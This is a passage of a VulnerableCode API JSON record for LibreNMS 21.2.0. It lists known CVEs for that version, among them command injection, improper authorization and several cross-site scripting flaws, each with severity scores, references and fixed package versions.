{"url":"http://public2.vulnerablecode.io/api/packages/535041?format=json","purl":"pkg:composer/librenms/librenms@21.2.0","type":"composer","namespace":"librenms","name":"librenms","version":"21.2.0","qualifiers":{},"subpath":"","is_vulnerable":true,"next_non_vulnerable_version":"26.3.0","latest_non_vulnerable_version":"201609","affected_by_vulnerabilities":[{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/110595?format=json","vulnerability_id":"VCID-13ug-m6cb-hbcc","summary":"Command injection in librenms\nLibreNMS v22.3.0 was discovered to contain multiple command injection vulnerabilities via the service_ip, hostname, and service_param parameters.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2022-29712","reference_id":"","reference_type":"","scores":[{"value":"0.0002","scoring_system":"epss","scoring_elements":"0.05865","published_at":"2026-06-05T12:55:00Z"},{"value":"0.0002","scoring_system":"epss","scoring_elements":"0.05838","published_at":"2026-06-09T12:55:00Z"},{"value":"0.0002","scoring_system":"epss","scoring_elements":"0.05813","published_at":"2026-06-08T12:55:00Z"},{"value":"0.0002","scoring_system":"epss","scoring_elements":"0.05858","published_at":"2026-06-07T12:55:00Z"},{"value":"0.0002","scoring_system":"epss","scoring_elements":"0.05844","published_at":"2026-06-04T12:55:00Z"},{"value":"0.0002","scoring_system":"epss","scoring_elements":"0.05856","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2022-29712"},{"reference_url":"https://github.com/librenms/librenms","reference_id":"","reference_type":"","scores":[{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/librenms/librenms"},{"reference_url":"https://github.com/librenms/librenms/commit/8b82341cb742e7bd4966964b399012f7ba017e0b","reference_id":"","reference_type":"","scores":[{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/librenms/librenms/commit/8b82341cb742e7bd4966964b399012f7ba017e0b"},{"reference_url":"https://github.com/librenms/librenms/pull/13932","reference_id":"","reference_type":"","scores":[{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/librenms/librenms/pull/13932"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2022-29712","reference_id":"","reference_type":"","scores":[{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2022-29712"},{"reference_url":"https://github.com/advisories/GHSA-23f2-vgr6-fwv7","reference_id":"GHSA-23f2-vgr6-fwv7","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-23f2-vgr6-fwv7"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/149308?format=json","purl":"pkg:composer/librenms/librenms@22.4.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-2ccw-938t-yyaj"},{"vulnerability":"VCID-2t5k-atx8-eycd"},{"vulnerability":"VCID-2w1a-3ym6-hygb"},{"vulnerability":"VCID-2z9m-fwyr-17b3"},{"vulnerability":"VCID-3b6p-2q4u-kkb5"},{"vulnerability":"VCID-5f5f-pkcz-bfhr"},{"vulnerability":"VCID-5hwq-6gme-c3gh"},{"vulnerability":"VCID-5vg7-7y5w-muhw"},{"vulnerability":"VCID-6cy6-6ss3-tqaz"},{"vulnerability":"VCID-7f5s-p5u4-abhh"},{"vulnerability":"VCID-7fbt-znx9-ukaj"},{"vulnerability":"VCID-7m7b-578h-bqhj"},{"vulnerability":"VCID-7s6j-vmn5-p7eh"},{"vulnerability":"VCID-7srz-umtt-n7e1"},{"vulnerability":"VCID-8ks5-6azh-67ed"},{"vulnerability":"VCID-8nsn-f1fc-6ucm"},{"vulnerability":"VCID-98mh-t1va-xqa8"},{"vulnerability":"VCID-99dx-dees-2fg3"},{"vulnerability":"VCID-af73-74xn-9fap"},{"vulnerability":"VCID-appm-zs6z-v3b2"},{"vulnerability":"VCID-b67g-878z-sygx"},{"vulnerability":"VCID-bfnn-xz3r-sfcv"},{"vulnerability":"VCID-ca8g-usbx-5ydu"},{"vulnerability":"VCID-cvn6-ggwj-9fcm"},{"vulnerability":"VCID-dff6-r5mp-p3d5"},{"vulnerability":"VCID-f9v9-rmse-cbcg"},{"vulnerability":"VCID-fc9k-4dhn-m7du"},{"vulnerability":"VCID-gj21-fy13-33h2"},{"vulnerability":"VCID-h5y9-mrn4-q7br"},{"vulnerability":"VCID-hacq-7c9c-qkaz"},{"vulnerability":"VCID-hj1w-rpxt-4ygp"},{"vulnerability":"VCID-jjwh-716d-73hc"},{"vulnerability":"VCID-jwh7-vtxs-aqhr"},{"vulnerability":"VCID-kkqd-nzsw-23cr"},{"vulnerability":"VCID-mchv-4jpx-audc"},{"vulnerability":"VCID-me5y-39aj-fkhe"},{"vulnerability":"VCID-mhf4-mtt1-t3fn"},{"vulnerability":"VCID-n5u3-c21p-ukas"},{"vulnerability":"VCID-ncgs-c7tb-gbfg"},{"vulnerability":"VCID-nyn8-7mkk-zbb3"},{"vulnerability":"VCID-pksv-nv1a-sqev"},{"vulnerability":"VCID-qhpe-7ws8-kqb7"},{"vulnerability":"VCID-qqnn-43db-guek"},{"vulnerability":"VCID-sa1y-ej2a-fba9"},{"vulnerability":"VCID-t5mk-a8n2-rkcg"},{"vulnerability":"VCID-u1km-tzd2-5bhq"},{"vulnerability":"VCID-us6w-wwkm-dqc5"},{"vulnerability":"VCID-uuwy-rk5r-tkc7"},{"vulnerability":"VCID-ux81-kyy9-bkaz"},{"vulnerability":"VCID-uzy1-yh5d-dqbt"},{"vulnerability":"VCID-v2sw-u952-7qfz"},{"vulnerability":"VCID-v3wv-6q6b-fqa3"},{"vulnerability":"VCID-vepx-waum-1bfc"},{"vulnerability":"VCID-w5dm-5pyj-cfef"},{"vulnerability":"VCID-w9mu-bbkx-sbeq"},{"vulnerability":"VCID-whxh-v47a-8yhh"},{"vulnerability":"VCID-x1aq-5a19-yye7"},{"vulnerability":"VCID-y3qu-d719-jff6"},{"vulnerability":"VCID-y5mq-m57f-b3bx"},{"vulnerability":"VCID-y6jm-2987-9uh2"},{"vulnerability":"VCID-yhmt-yukb-kuge"},{"vulnerability":"VCID-ywp5-cwm9-afb5"},{"vulnerability":"VCID-z744-37t6-pud6"},{"vulnerability":"VCID-zech-eg55-gbcn"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/librenms/librenms@22.4.0"}],"aliases":["CVE-2022-29712","GHSA-23f2-vgr6-fwv7"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-13ug-m6cb-hbcc"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/42405?format=json","vulnerability_id":"VCID-1q9d-aqn7-67ad","summary":"Improper Authorization\nImproper authorization handling was found in librenms.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2022-0587","reference_id":"","reference_type":"","scores":[{"value":"2e-05","scoring_system":"epss","scoring_elements":"0.00058","published_at":"2026-06-09T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2022-0587"},{"reference_url":"https://github.com/librenms/librenms","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/librenms/librenms"},{"reference_url":"https://github.com/librenms/librenms/commit/95970af78e4c899744a715766d744deef8c505f7","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/librenms/librenms/commit/95970af78e4c899744a715766d744deef8c505f7"},{"reference_url":"https://huntr.dev/bounties/0c7c9ecd-33ac-4865-b05b-447ced735469","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://huntr.dev/bounties/0c7c9ecd-33ac-4865-b05b-447ced735469"},{"reference_url":"https://notes.netbytesec.com/2022/02/multiple-vulnerabilities-in-librenms.html","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://notes.netbytesec.com/2022/02/multiple-vulnerabilities-in-librenms.html"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2022-0587","reference_id":"CVE-2022-0587","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2022-0587"},{"reference_url":"https://github.com/advisories/GHSA-ppfm-rj6p-38q6","reference_id":"GHSA-ppfm-rj6p-38q6","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-ppfm-rj6p-38q6"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/60660?format=json","purl":"pkg:composer/librenms/librenms@22.2.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-13ug-m6cb-hbcc"},{"vulnerability":"VCID-2ccw-938t-yyaj"},{"vulnerability":"VCID-2t5k-atx8-eycd"},{"vulnerability":"VCID-2w1a-3ym6-hygb"},{"vulnerability":"VCID-2z9m-fwyr-17b3"},{"vulnerability":"VCID-3b6p-2q4u-kkb5"},{"vulnerability":"VCID-5f5f-pkcz-bfhr"},{"vulnerability":"VCID-5hwq-6gme-c3gh"},{"vulnerability":"VCID-5vg7-7y5w-muhw"},{"vulnerability":"VCID-6cy6-6ss3-tqaz"},{"vulnerability":"VCID-7f5s-p5u4-abhh"},{"vulnerability":"VCID-7fbt-znx9-ukaj"},{"vulnerability":"VCID-7m7b-578h-bqhj"},{"vulnerability":"VCID-7s6j-vmn5-p7eh"},{"vulnerability":"VCID-7srz-umtt-n7e1"},{"vulnerability":"VCID-8ks5-6azh-67ed"},{"vulnerability":"VCID-8nsn-f1fc-6ucm"},{"vulnerability":"VCID-98mh-t1va-xqa8"},{"vulnerability":"VCID-99dx-dees-2fg3"},{"vulnerability":"VCID-af73-74xn-9fap"},{"vulnerability":"VCID-appm-zs6z-v3b2"},{"vulnerability":"VCID-b67g-878z-sygx"},{"vulnerability":"VCID-bfnn-xz3r-sfcv"},{"vulnerability":"VCID-ca8g-usbx-5ydu"},{"vulnerability":"VCID-cvn6-ggwj-9fcm"},{"vulnerability":"VCID-dff6-r5mp-p3d5"},{"vulnerability":"VCID-f9v9-rmse-cbcg"},{"vulnerability":"VCID-fc9k-4dhn-m7du"},{"vulnerability":"VCID-gj21-fy13-33h2"},{"vulnerability":"VCID-h5y9-mrn4-q7br"},{"vulnerability":"VCID-hacq-7c9c-qkaz"},{"vulnerability":"VCID-hj1w-rpxt-4ygp"},{"vulnerability":"VCID-jjwh-716d-73hc"},{"vulnerability":"VCID-jwh7-vtxs-aqhr"},{"vulnerability":"VCID-kkqd-nzsw-23cr"},{"vulnerability":"VCID-kn2w-mmss-s7hu"},{"vulnerability":"VCID-mchv-4jpx-audc"},{"vulnerability":"VCID-me5y-39aj-fkhe"},{"vulnerability":"VCID-mhf4-mtt1-t3fn"},{"vulnerability":"VCID-n5u3-c21p-ukas"},{"vulnerability":"VCID-ncgs-c7tb-gbfg"},{"vulnerability":"VCID-nyn8-7mkk-zbb3"},{"vulnerability":"VCID-pksv-nv1a-sqev"},{"vulnerability":"VCID-qhpe-7ws8-kqb7"},{"vulnerability":"VCID-qqnn-43db-guek"},{"vulnerability":"VCID-sa1y-ej2a-fba9"},{"vulnerability":"VCID-t5mk-a8n2-rkcg"},{"vulnerability":"VCID-u1km-tzd2-5bhq"},{"vulnerability":"VCID-us6w-wwkm-dqc5"},{"vulnerability":"VCID-uuwy-rk5r-tkc7"},{"vulnerability":"VCID-ux81-kyy9-bkaz"},{"vulnerability":"VCID-uzy1-yh5d-dqbt"},{"vulnerability":"VCID-v2sw-u952-7qfz"},{"vulnerability":"VCID-v3wv-6q6b-fqa3"},{"vulnerability":"VCID-vepx-waum-1bfc"},{"vulnerability":"VCID-w5dm-5pyj-cfef"},{"vulnerability":"VCID-w9mu-bbkx-sbeq"},{"vulnerability":"VCID-whxh-v47a-8yhh"},{"vulnerability":"VCID-x1aq-5a19-yye7"},{"vulnerability":"VCID-y3qu-d719-jff6"},{"vulnerability":"VCID-y5mq-m57f-b3bx"},{"vulnerability":"VCID-y6jm-2987-9uh2"},{"vulnerability":"VCID-yhmt-yukb-kuge"},{"vulnerability":"VCID-ywp5-cwm9-afb5"},{"vulnerability":"VCID-z744-37t6-pud6"},{"vulnerability":"VCID-zech-eg55-gbcn"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/librenms/librenms@22.2.0"},{"url":"http://public2.vulnerablecode.io/api/packages/539238?format=json","purl":"pkg:composer/librenms/librenms@201609","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/librenms/librenms@201609"}],"aliases":["CVE-2022-0587","GHSA-ppfm-rj6p-38q6"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-1q9d-aqn7-67ad"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/45846?format=json","vulnerability_id":"VCID-2ccw-938t-yyaj","summary":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')\nCross-site Scripting (XSS) - Reflected in GitHub repository librenms/librenms prior to 23.8.0.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2023-4347","reference_id":"","reference_type":"","scores":[{"value":"0.77327","scoring_system":"epss","scoring_elements":"0.98999","published_at":"2026-06-07T12:55:00Z"},{"value":"0.77327","scoring_system":"epss","scoring_elements":"0.99","published_at":"2026-06-06T12:55:00Z"},{"value":"0.77327","scoring_system":"epss","scoring_elements":"0.98998","published_at":"2026-06-09T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2023-4347"},{"reference_url":"https://github.com/librenms/librenms","reference_id":"","reference_type":"","scores":[{"value":"7.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/librenms/librenms"},{"reference_url":"https://github.com/librenms/librenms/commit/91c57a1ee54631e071b6b0c952d99c8ee892e824","reference_id":"","reference_type":"","scores":[{"value":"7.6","scoring_system":"cvssv3","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:L"},{"value":"7.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-03T13:39:38Z/"}],"url":"https://github.com/librenms/librenms/commit/91c57a1ee54631e071b6b0c952d99c8ee892e824"},{"reference_url":"https://huntr.dev/bounties/1f78c6e1-2923-46c5-9376-4cc5a8f1152f","reference_id":"","reference_type":"","scores":[{"value":"7.6","scoring_system":"cvssv3","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:L"},{"value":"7.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-03T13:39:38Z/"}],"url":"https://huntr.dev/bounties/1f78c6e1-2923-46c5-9376-4cc5a8f1152f"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2023-4347","reference_id":"CVE-2023-4347","reference_type":"","scores":[{"value":"7.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2023-4347"},{"reference_url":"https://github.com/advisories/GHSA-m6pf-cm3f-7876","reference_id":"GHSA-m6pf-cm3f-7876","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-m6pf-cm3f-7876"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/66567?format=json","purl":"pkg:composer/librenms/librenms@23.8.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-2t5k-atx8-eycd"},{"vulnerability":"VCID-2w1a-3ym6-hygb"},{"vulnerability":"VCID-2z9m-fwyr-17b3"},{"vulnerability":"VCID-5f5f-pkcz-bfhr"},{"vulnerability":"VCID-5hwq-6gme-c3gh"},{"vulnerability":"VCID-5vg7-7y5w-muhw"},{"vulnerability":"VCID-6cy6-6ss3-tqaz"},{"vulnerability":"VCID-7f5s-p5u4-abhh"},{"vulnerability":"VCID-7m7b-578h-bqhj"},{"vulnerability":"VCID-7s6j-vmn5-p7eh"},{"vulnerability":"VCID-8ks5-6azh-67ed"},{"vulnerability":"VCID-8nsn-f1fc-6ucm"},{"vulnerability":"VCID-98mh-t1va-xqa8"},{"vulnerability":"VCID-99dx-dees-2fg3"},{"vulnerability":"VCID-af73-74xn-9fap"},{"vulnerability":"VCID-appm-zs6z-v3b2"},{"vulnerability":"VCID-bfnn-xz3r-sfcv"},{"vulnerability":"VCID-ca8g-usbx-5ydu"},{"vulnerability":"VCID-cvn6-ggwj-9fcm"},{"vulnerability":"VCID-dff6-r5mp-p3d5"},{"vulnerability":"VCID-f9v9-rmse-cbcg"},{"vulnerability":"VCID-fc9k-4dhn-m7du"},{"vulnerability":"VCID-gj21-fy13-33h2"},{"vulnerability":"VCID-h5y9-mrn4-q7br"},{"vulnerability":"VCID-hacq-7c9c-qkaz"},{"vulnerability":"VCID-hj1w-rpxt-4ygp"},{"vulnerability":"VCID-jjwh-716d-73hc"},{"vulnerability":"VCID-jwh7-vtxs-aqhr"},{"vulnerability":"VCID-kkqd-nzsw-23cr"},{"vulnerability":"VCID-mchv-4jpx-audc"},{"vulnerability":"VCID-me5y-39aj-fkhe"},{"vulnerability":"VCID-mhf4-mtt1-t3fn"},{"vulnerability":"VCID-n5u3-c21p-ukas"},{"vulnerability":"VCID-ncgs-c7tb-gbfg"},{"vulnerability":"VCID-nyn8-7mkk-zbb3"},{"vulnerability":"VCID-pksv-nv1a-sqev"},{"vulnerability":"VCID-qhpe-7ws8-kqb7"},{"vulnerability":"VCID-sa1y-ej2a-fba9"},{"vulnerability":"VCID-t5mk-a8n2-rkcg"},{"vulnerability":"VCID-u1km-tzd2-5bhq"},{"vulnerability":"VCID-us6w-wwkm-dqc5"},{"vulnerability":"VCID-uuwy-rk5r-tkc7"},{"vulnerability":"VCID-ux81-kyy9-bkaz"},{"vulnerability":"VCID-uzy1-yh5d-dqbt"},{"vulnerability":"VCID-v2sw-u952-7qfz"},{"vulnerability":"VCID-v3wv-6q6b-fqa3"},{"vulnerability":"VCID-vepx-waum-1bfc"},{"vulnerability":"VCID-w9mu-bbkx-sbeq"},{"vulnerability":"VCID-whxh-v47a-8yhh"},{"vulnerability":"VCID-y3qu-d719-jff6"},{"vulnerability":"VCID-y5mq-m57f-b3bx"},{"vulnerability":"VCID-yhmt-yukb-kuge"},{"vulnerability":"VCID-ywp5-cwm9-afb5"},{"vulnerability":"VCID-z744-37t6-pud6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/librenms/librenms@23.8.0"},{"url":"http://public2.vulnerablecode.io/api/packages/539238?format=json","purl":"pkg:composer/librenms/librenms@201609","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/librenms/librenms@201609"}],"aliases":["CVE-2023-4347","GHSA-m6pf-cm3f-7876"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-2ccw-938t-yyaj"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50236?format=json","vulnerability_id":"VCID-2t5k-atx8-eycd","summary":"LibreNMS /port-groups name Stored Cross-Site Scripting\n**/port-groups name Stored Cross-Site Scripting**\n\n- HTTP POST\n- Request-URI(s): \"/port-groups\"\n- Vulnerable parameter(s): \"name\"\n- Attacker must be authenticated with \"admin\" privileges.\n- When a user adds a port group, an HTTP POST request is sent to the Request-URI \"/port-groups\". The name of the newly created port group is stored in the value of the name parameter.\n- After the port group is created, the entry is displayed along with some relevant buttons like Edit and Delete.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-26992","reference_id":"","reference_type":"","scores":[{"value":"4e-05","scoring_system":"epss","scoring_elements":"0.00196","published_at":"2026-06-09T12:55:00Z"},{"value":"4e-05","scoring_system":"epss","scoring_elements":"0.00198","published_at":"2026-06-08T12:55:00Z"},{"value":"4e-05","scoring_system":"epss","scoring_elements":"0.00197","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-26992"},{"reference_url":"https://github.com/librenms/librenms","reference_id":"","reference_type":"","scores":[{"value":"5.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/librenms/librenms"},{"reference_url":"https://github.com/librenms/librenms/commit/882fe6f90ea504a3732f83caf89bba7850a5699f","reference_id":"","reference_type":"","scores":[{"value":"5.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-02-20T15:52:54Z/"}],"url":"https://github.com/librenms/librenms/commit/882fe6f90ea504a3732f83caf89bba7850a5699f"},{"reference_url":"https://github.com/librenms/librenms/pull/19042","reference_id":"","reference_type":"","scores":[{"value":"5.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-02-20T15:52:54Z/"}],"url":"https://github.com/librenms/librenms/pull/19042"},{"reference_url":"https://github.com/librenms/librenms/releases/tag/26.2.0","reference_id":"","reference_type":"","scores":[{"value":"5.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-02-20T15:52:54Z/"}],"url":"https://github.com/librenms/librenms/releases/tag/26.2.0"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-26992","reference_id":"CVE-2026-26992","reference_type":"","scores":[{"value":"5.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-26992"},{"reference_url":"https://github.com/advisories/GHSA-93fx-g747-695x","reference_id":"GHSA-93fx-g747-695x","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-93fx-g747-695x"},{"reference_url":"https://github.com/librenms/librenms/security/advisories/GHSA-93fx-g747-695x","reference_id":"GHSA-93fx-g747-695x","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-02-20T15:52:54Z/"}],"url":"https://github.com/librenms/librenms/security/advisories/GHSA-93fx-g747-695x"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74102?format=json","purl":"pkg:composer/librenms/librenms@26.2.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-7f5s-p5u4-abhh"},{"vulnerability":"VCID-7s6j-vmn5-p7eh"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/librenms/librenms@26.2.0"}],"aliases":["CVE-2026-26992","GHSA-93fx-g747-695x"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-2t5k-atx8-eycd"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/55915?format=json","vulnerability_id":"VCID-2w1a-3ym6-hygb","summary":"LibreNMS has Stored Cross-site Scripting vulnerability in \"Device Group\" Name\nThe application fail to sanitising inputs properly and rendering the code from user input to browser which allow an attacker to execute malicious javascript code.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-47524","reference_id":"","reference_type":"","scores":[{"value":"0.00043","scoring_system":"epss","scoring_elements":"0.13452","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00043","scoring_system":"epss","scoring_elements":"0.13402","published_at":"2026-06-09T12:55:00Z"},{"value":"0.00043","scoring_system":"epss","scoring_elements":"0.13372","published_at":"2026-06-08T12:55:00Z"},{"value":"0.00043","scoring_system":"epss","scoring_elements":"0.13491","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00043","scoring_system":"epss","scoring_elements":"0.13485","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-47524"},{"reference_url":"https://github.com/librenms/librenms","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"7.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/librenms/librenms"},{"reference_url":"https://github.com/librenms/librenms/commit/d3b51560a8e2343e520d16e9adc72c6951aa91ee","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"7.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-10-02T12:58:50Z/"}],"url":"https://github.com/librenms/librenms/commit/d3b51560a8e2343e520d16e9adc72c6951aa91ee"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-47524","reference_id":"CVE-2024-47524","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"7.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-47524"},{"reference_url":"https://github.com/advisories/GHSA-fc38-2254-48g7","reference_id":"GHSA-fc38-2254-48g7","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-fc38-2254-48g7"},{"reference_url":"https://github.com/librenms/librenms/security/advisories/GHSA-fc38-2254-48g7","reference_id":"GHSA-fc38-2254-48g7","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H